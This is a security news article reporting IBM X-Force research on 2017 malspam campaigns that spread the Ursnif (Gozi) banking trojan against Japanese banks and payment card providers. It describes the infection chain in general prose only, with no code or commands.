Ursnif banking malware surges in Japan, banks and payment card Cos hit

News by Bradley Barth

Malspam campaigns designed to spread the Ursnif banking trojan have been heavily targeting Japanese banks and payment card providers in 2017, especially since September, according to IBM'sX-Force research team.

Also in:

Malspam campaigns designed to spread the Ursnif banking trojan have been heavily targeting Japanese banks and payment card providers in 2017, especially since September, according to IBM'sX-Force research team.

This attack has been leveraging Ursnif, also known as Gozi, to steal data from secure sessions, perform web injections and execute page redirections, reports Limor Kessem, IBM cyber-security expert, in a company blog post on Thursday last week. The malware targets banking credentials and local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, the report continues.

Because the targets in each successive attack have been the same, IBM posits that one threat actor is responsible for all of the spam campaigns, most of which infect victims with fake attachments designed to impersonate Japanese financial services and payment card providers.

"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem writes. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains."

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming Events